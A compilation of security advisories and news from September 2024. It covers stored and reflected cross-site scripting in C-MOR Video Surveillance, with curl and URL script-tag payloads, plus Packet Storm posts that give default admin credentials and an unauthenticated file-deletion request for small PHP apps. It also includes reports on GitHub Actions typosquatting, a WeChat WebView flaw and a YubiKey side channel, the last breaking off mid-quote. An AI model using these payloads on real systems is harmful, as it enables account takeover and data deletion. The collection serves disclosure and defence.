C-MOR Video Surveillance versions 5.2401 and 6.00PL01 suffer from a persistent cross site scripting vulnerability.

Advisory ID:               SYSS-2024-021  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401, 6.00PL01  
Tested Version(s):         5.2401, 6.00PL01  
Vulnerability Type:        Persistent Cross-Site Scripting (CWE-79)  
Risk Level:                High  
Solution Status:           Open  
Manufacturer Notification: 2024-04-05  
Solution Date:             -  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45177  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper input validation, the C-MOR web interface is vulnerable  
to persistent cross-site scripting attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that the camera  
configuration is vulnerable to a persistent cross-site scripting attack  
due to insufficient user input validation.

This kind of attack enables an attacker to persistently store attack  
vectors in form of arbitrary code, for instance JavaScript code, in the  
web application database, which may be executed in the context of other  
users.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

An authenticated user can set the location of a camera. If valid  
JavaScript code is used as location value, this code will be  
persistently stored in the web application database.

The injected JavaScript code is served to users and executed in their  
web browser's context when using different functionality of the C-MOR  
web interface, for instance camera settings via "show-movies.plm" or  
system administration via "systemadministration.plm".

The following HTTPS POST request illustrates storing an attack vector  
via the parameter "location":

POST /changelocation.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 81

location=location%3Cscript%3Ealert%28%22SySS+XSS%21%22%29%3C%2Fscript%3E&cam=cam1

An excerpt of the resulting HTML source code containing the injected  
JavaScript code is shown below:

(...)  
<input type=submit value="Aufzeichnung aktivieren" class="link_button2">   
location<script>alert("SySS XSS!")</script><br>  
(...)

This PoC attack can be performed using the following curl command:

curl -X POST -d 'location=location<script>alert("SySS   
XSS!")</script>&cam=cam1' --user "<USERNAME>:<PASSWORD>" --insecure   
--ciphers 'DEFAULT:!DH' https://<HOST>/changelocation.pml

In version 6.00PL01, persistent cross-site scripting vulnerabilties have  
not been fixed completely. For example, the following attack vector can  
successfully store attacker-controlled JavaScript code in the logs:

curl -X POST \  
    -d 'cam=</textarea><script>alert("Hello from   
XSS")</script><textarea>&days=1100' \  
    --user "<USERNAME>:<PASSWORD>" \  
    --insecure \  
    --ciphers 'DEFAULT:!DH' \  
    https://<HOST>/show-movies.pml

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

The described security vulnerability has not been fixed entirely in the  
newly released software version 6.00PL01.

There is no fix for this security issue.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-021

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-021.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 / 6.00PL01 Cross Site Scripting

C-MOR Video Surveillance version 5.2401 suffers from a reflective cross site scripting vulnerability.

Advisory ID:               SYSS-2024-020  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Reflected Cross-Site Scripting (CWE-79)  
Risk Level:                Medium  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45176  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper input validation, the C-MOR web interface is vulnerable  
to reflected cross-site scripting attacks.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functions are prone to reflected cross-site scripting attacks due to  
insufficient user input validation.

This kind of attack allows an attacker to send a manipulated link to  
an authenticated victim in order to execute arbitrary JavaScript code  
in the context of the victim's web browser.

Reflected cross-site scripting vulnerabilities were found in the  
following C-MOR scripts and exploited via different URL parameters,  
for instance the parameter "ujava":

* index-de.plm  
* list-timelapse.plm  
* list-motion.plm  
* setdelays.plm  
* show-movies.plm  
* show-movies-f.plm  
* uploadcambackup.plm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following three sample attack vectors exemplarily demonstrate  
the found security issue.

1) index-de.plm

The following URL is an example of an attack vector exploiting a  
reflected cross-site scripting vulnerability via the URL parameter  
"ujava" of the web interface index page "index-de.plm":

https://<HOST>/index-de.pml?ujava="><script>alert("SySS XSS!")</script><z="

2) list-timelapse.plm

The following URL is an example of an attack vector exploiting a  
reflected cross-site scripting vulnerability in the page  
"list-timelapse.plm" via the URL parameter "days":

https://<HOST>/list-timelapse.pml?days=1100&cam=cam1"><script>alert("SySS   
XSS!")</script><z="

3) show-movies.plm

The following URL is an example of an attack vector exploiting a  
reflected cross-site scripting vulnerability in the page  
"show-movies.plm" via the URL parameter "days":

https://<HOST>/show-movies.pml?cam=cam1&days="><script>alert("SySS   
XSS!")</script><z="

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-020

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-020.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Cross Site Scripting

Online Sports Complex Booking System version 1.0 suffers from an ignored default credential vulnerability.

**Online Sports Complex Booking System 1.0 Insecure Settings**

Posted Sep 6, 2024

Authored by indoushka

Online Sports Complex Booking System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 7ef39718e1694996d6c3234f87defd525659e7cde8353fa86e03c43c5fd1bf04

Download | Favorite | View

**Online Sports Complex Booking System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Online Sports Complex Booking System v1.0 Insecure Settings Vulnerability                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15236/online-sports-complex-booking-system-phpmysql-free-source-code.html       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

Online Sports Complex Booking System 1.0 Insecure Settings

Online Pizza Ordering System version 1.0 suffers from an ignored default credential vulnerability.

**Online Pizza Ordering System 1.0 Insecure Settings**

Posted Sep 6, 2024

Authored by indoushka

Online Pizza Ordering System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | ea183be601d90798e6a525ee32f1811b36b16ef45e82b7172ff7fd9dada60b8e

Download | Favorite | View

**Online Pizza Ordering System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Online Pizza Ordering System v1.0 Insecure Settings Vulnerability                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

Online Pizza Ordering System 1.0 Insecure Settings

File Management System version 1.0 suffers from an insecure direct object reference vulnerability.

**File Management System 1.0 Insecure Direct Object Reference**

Posted Sep 6, 2024

Authored by indoushka

File Management System version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 80d45521f02111223db9c15921f68ebb49c243151cc2e7da343578636283f910

Download | Favorite | View

**File Management System 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : File Management System 1.0 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/file-management-system-in-php-mysql-source-code/?wpdmdl=7992&refresh=66bba3bd946da1723573181                           |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Payload enables deletion of uploaded files from admin control panel without login.[+] use payload : /Private_Dashboard/delete.php?ID=5[+] 127.0.0.1/demo/Private_Dashboard/delete.php?ID=5Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,685)
*   Arbitrary (17,036)
*   BBS (2,859)
*   Bypass (1,902)
*   CGI (1,047)
*   Code Execution (7,875)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,421)
*   DoS (25,203)
*   Encryption (2,393)
*   Exploit (54,137)
*   File Inclusion (4,271)
*   File Upload (1,009)
*   Firewall (822)
*   Info Disclosure (2,912)
*   Intrusion Detection (917)
*   Java (3,155)
*   JavaScript (907)
*   Kernel (7,258)
*   Local (14,836)
*   Magazine (587)
*   Overflow (13,207)
*   Perl (1,435)
*   PHP (5,253)
*   Proof of Concept (2,401)
*   Protocol (3,749)
*   Python (1,654)
*   Remote (31,825)
*   Root (3,669)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,041)
*   Shell (3,298)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,700)
*   TCP (2,462)
*   Trojan (690)
*   UDP (919)
*   Virus (672)
*   Vulnerability (33,054)
*   Web (10,130)
*   Whitepaper (3,783)
*   x86 (969)
*   XSS (18,281)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,117)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (880)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,066)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,731)
*   Slackware (941)
*   Solaris (1,614)
*   SUSE (1,444)
*   Ubuntu (9,807)
*   UNIX (9,449)
*   UnixWare (187)
*   Windows (6,762)
*   Other

File Management System 1.0 Insecure Direct Object Reference

Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages.

These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com).

Adversaries targeting open-source repositories across

Software Security / Hacking

Threat actors have long leveraged typosquatting as a means to trick unsuspecting users into visiting malicious websites or downloading booby-trapped software and packages.

These attacks typically involve registering domains or packages with names slightly altered from their legitimate counterparts (e.g., goog1e.com vs. google.com).

Adversaries targeting open-source repositories across platforms have relied on developers making typing errors to initiate software supply chain attacks through PyPI, npm, Maven Central, NuGet, RubyGems, and Crate.

The latest findings from cloud security firm Orca show that even GitHub Actions, a continuous integration and continuous delivery (CI/CD) platform, is not immune from the threat.

"If developers make a typo in their GitHub Action that matches a typosquatter's action, applications could be made to run malicious code without the developer even realizing," security researcher Ofir Yakobi said in a report shared with The Hacker News.

The attack is possible because anyone can publish a GitHub Action by creating a GitHub account with a temporary email account. Given that actions run within the context of a user's repository, a malicious action could be exploited to tamper with the source code, steal secrets, and use it to deliver malware.

All that the technique involves is for the attacker to create organizations and repositories with names that closely resemble popular or widely-used GitHub Actions.

If a user makes inadvertent spelling errors when setting up a GitHub action for their project and that misspelled version has already been created by the adversary, then the user's workflow will run the malicious action as opposed to the intended one.

"Imagine an action that exfiltrates sensitive information or modifies code to introduce subtle bugs or backdoors, potentially affecting all future builds and deployments," Yakobi said.

"In fact, a compromised action can even leverage your GitHub credentials to push malicious changes to other repositories within your organization, amplifying the damage across multiple projects."

Orca said that a search on GitHub revealed as many as 198 files that invoke "action/checkout" or "actons/checkout" instead of "actions/checkout" (note the missing "s" and "i"), putting all those projects at risk.

This form of typosquatting is appealing to threat actors because it's a low-cost, high-impact attack that could result in powerful software supply chain compromises, affecting several downstream customers all at once.

Users are advised to double-check actions and their names to ensure they are referencing the correct GitHub organization, stick to actions from trusted sources, and periodically scan their CI/CD workflows for typosquatting issues.

"This experiment highlights how easy it is for attackers to exploit typosquatting in GitHub Actions and the importance of vigilance and best practices in preventing such attacks," Yakobi said.

"The actual problem is even more concerning because here we are only highlighting what happens in public repositories. The impact on private repositories, where the same typos could be leading to serious security breaches, remains unknown."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

GitHub Actions Vulnerable to Typosquatting, Exposing Developers to Hidden Malicious Code

While this issue was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported it to the vendor.

Friday, September 6, 2024 06:00

*   Certain versions of WeChat, a popular messaging app created by tech giant Tencent, contain a type confusion vulnerability that could allow an adversary to execute remote code. 
*   While this issue, CVE-2023-3420, was disclosed and patched in the V8 engine in June 2023, the WeChat Webview component was not updated, and still remained vulnerable when Talos reported to the vendor in April 2024.  
*   Cisco Talos researchers have confirmed that WeChat versions up to 8.0.42 (the latest version on the Google Play store for Android devices before June 14, 2024) were vulnerable to this issue. However, due to the dynamic WebView loading mechanism, Talos cannot confirm if it’s patched on all versions. 
*   Talos reported the vulnerability to Tencent WeChat on April 30, 2024, and continued our investigation in the following weeks and months. 

**Vulnerability overview **

WeChat is an instant messenger application with a large user base in China. It also offers users the ability to pay for certain products through the app and includes several functionalities similar to other social media platforms like Facebook and X. 

During Cisco Talos’ research of WeChat, we uncovered that it employs a custom WebView component instead of relying on the built-in Android WebView. This component is a custom version of XWalk, maintained by Tencent, which consists of an embedded Chromium browser with V8 version 8.6.365.13 released on Oct. 12, 2020, supporting the rendering of HTML and the execution of JavaScript. 

The custom WebView component is dynamically downloaded onto the phone after the user logs into the app for the first time, allowing Tencent to deploy dynamic updates. When downloaded, XWalk webview is located at the path \`/data/data/com.tencent.mm/app\_xwalk\_4433/apk/base.apk\`. The library at /data/data/com.tencent.mm/app_xwalk_4433/extracted_xwalkcore/libxwebcore.so contains an embedded browser environment with an outdated version of V8.  

GitHub Security Labs published detailed analysis of this vulnerability, CVE-2023-3420, for V8 version 11.4.183.19 in June 2023.      

**How can the exploit be triggered? **

The exploit, which we have seen in the wild,  is triggered when the victim clicks a URL in a malicious WeChat message. Clicking a URL in WeChat causes the webpage with embedded JavaScript to be loaded inside XWalk, which triggers exploitation. A so called one-click exploit. 

**What is the impact of this vulnerability? **

The exploit allows the threat actor to gain control of the victim's device and execute arbitrary code. 

> CVSSv3 Score: 8.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H  

**How do I know if I’m impacted? **

Talos has confirmed the WeChat version 8.0.42 (the latest version available on the Play Store before June 14) is impacted. For WeChat using the impacted custom browser (MMWEBID/2247), the user agent of request includes the version information of the custom browser. For example: 

_Mozilla/5.0 (Linux; Android 14; Pixel 6 Build/UQ1A.240105.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/86.0.4240.99 XWEB/4433 MMWEBSDK/20230805 Mobile Safari/537.36 MMWEBID/2247 MicroMessenger/8.0.42.2428(0x28002A48) WeChat/arm64 Weixin GPVersion/1 NetType/4G Language/en ABI/arm64_  

**What do I do if I’m impacted? **

Update to the latest version of WeChat and confirm XWalk is updated as well (in our testing, the app does not get updated to the latest version automatically right after the update is released). Alternatively, do not click on any links sent over WeChat if using the impacted versions. If you must read links, copy the link from the WeChat chat and open them on an updated web browser outside the application. We recommend WeChat users be aware of the URL links sent in WeChat. Before clicking the URL links, verify it’s from a trusted source.  

**Bug report Timeline **

*   April 30, 2024: Disclosed to vendor while research was ongoing. 
*   May 31, 2024: Tencent acknowledges report and confirms they know about the vulnerability and are working on patching it. 
*   June 14, 2024: New version of WeChat 8.0.48 released on Play Store. However, the app on our testing device did not get automatically updated.  
*   June 27, 2024: Notified Vendor of our intention to publish. 

**Credit **

Chi En Shen (Ashley Shen), Vitor Ventura, Michael Gentile and Aleksandar Nikolic of Cisco Talos.

Vulnerability in Tencent WeChat custom browser could lead to remote code execution

Security researchers have discovered a cryptographic flaw that leaves the YubiKey 5 vulnerable to attack.

The YubiKey 5, the most widely used hardware token for two-factor authentication based on the FIDO standard, contains a cryptographic flaw that makes the finger-sized device vulnerable to cloning when an attacker gains temporary physical access to it, researchers said Tuesday.

The cryptographic flaw, known as a side channel, resides in a small microcontroller used in a large number of other authentication devices, including smartcards used in banking, electronic passports, and the accessing of secure areas. While the researchers have confirmed all YubiKey 5 series models can be cloned, they haven’t tested other devices using the microcontroller, such as the SLE78 made by Infineon and successor microcontrollers known as the Infineon Optiga Trust M and the Infineon Optiga TPM. The researchers suspect that any device using any of these three microcontrollers and the Infineon cryptographic library contains the same vulnerability.

**Patching Not Possible**

YubiKey maker Yubico issued an advisory in coordination with a detailed disclosure report from NinjaLab, the security firm that reverse engineered the YubiKey 5 series and devised the cloning attack. All YubiKeys running firmware prior to version 5.7—which was released in May and replaces the Infineon cryptolibrary with a custom one—are vulnerable. Updating key firmware on the YubiKey isn’t possible. That leaves all affected YubiKeys permanently vulnerable.

“An attacker could exploit this issue as part of a sophisticated and targeted attack to recover affected private keys,” the advisory confirmed. “The attacker would need physical possession of the YubiKey, Security Key, or YubiHSM; knowledge of the accounts they want to target; and specialized equipment to perform the necessary attack. Depending on the use case, the attacker may also require additional knowledge, including username, PIN, account password, or authentication key.”

Side channels are the result of clues left in physical manifestations such as electromagnetic emanations, data caches, or the time required to complete a task that leaks cryptographic secrets. In this case, the side channel is the amount of time taken during a mathematical calculation known as a modular inversion. The Infineon cryptolibrary failed to implement a common side-channel defense known as constant time as it performs modular inversion operations involving the Elliptic Curve Digital Signature Algorithm. Constant time ensures the time-sensitive cryptographic operations execute is uniform rather than variable depending on the specific keys.

More precisely, the side channel is located in the Infineon implementation of the Extended Euclidean Algorithm, a method for, among other things, computing the modular inverse. By using an oscilloscope to measure the electromagnetic radiation while the token is authenticating itself, the researchers can detect tiny execution time differences that reveal a token’s ephemeral ECDSA key, also known as a nonce. Further analysis allows the researchers to extract the secret ECDSA key that underpins the entire security of the token.

In Tuesday’s report, NinjaLab cofounder Thomas Roche wrote:

> In the present work, NinjaLab unveils a new side-channel vulnerability in the ECDSA implementation of Infineon 9 on any security microcontroller family of the manufacturer. This vulnerability lies in the ECDSA ephemeral key (or nonce) modular inversion, and, more precisely, in the Infineon implementation of the Extended Euclidean Algorithm (EEA for short). To our knowledge, this is the first time an implementation of the EEA is shown to be vulnerable to side-channel analysis (contrarily to the EEA binary version). The exploitation of this vulnerability is demonstrated through realistic experiments and we show that an adversary only needs to have access to the device for a few minutes. The offline phase took us about 24 hours; with more engineering work in the attack development, it would take less than one hour.
> 
> After a long phase of understanding Infineon implementation through side-channel analysis on a Feitian 10 open JavaCard smartcard, the attack is tested on a YubiKey 5Ci, a FIDO hardware token from Yubico. All YubiKey 5 Series (before the firmware update 5.7 11 of May 6th, 2024) are affected by the attack. In fact all products relying on the ECDSA of Infineon cryptographic library running on an Infineon security microcontroller are affected by the attack. We estimate that the vulnerability exists for more than 14 years in Infineon top secure chips. These chips and the vulnerable part of the cryptographic library went through about 80 CC certification evaluations of level AVA VAN 4 (for TPMs) or AVA VAN 5 (for the others) from 2010 to 2024 (and a bit less than 30 certificate maintenances).

In an online interview, Roche elaborated:

> Infineon produces “security microcontrollers” or “secure elements.” You can find many of them out there. Some of them (and this is the case for YubiKey 5 Series) run the Infineon cryptographic library (that Infineon develops for their customers that do not want to develop their own).
> 
> This cryptolibrary is highly confidential (even its API is secret, you need to sign an NDA with Infineon just to know the API). Nobody, but Infineon, knows the cryptolibrary details and notably its countermeasures choices.
> 
> This cryptolibrary, as many others, implement the ECDSA (core crypto function of FIDO, but also used in many different applications/protocols). Inside the ECDSA scheme, there are several sub-functions calls, one of them is the modular inversion of the ECDSA ephemeral key. This is a very sensitive operation: any information leaking about the ECDSA ephemeral key would eventually reveal the ECDSA secret key.
> 
